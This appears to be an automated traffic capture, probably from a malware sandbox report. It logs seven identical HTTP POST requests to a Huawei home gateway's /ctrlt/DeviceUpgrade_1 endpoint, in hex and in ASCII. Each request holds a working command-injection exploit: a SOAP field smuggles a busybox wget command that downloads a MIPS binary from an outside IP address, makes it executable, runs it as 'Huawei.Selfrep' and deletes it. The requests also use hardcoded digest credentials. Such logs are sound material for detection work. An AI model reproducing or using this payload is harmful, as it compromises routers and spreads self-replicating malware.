Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |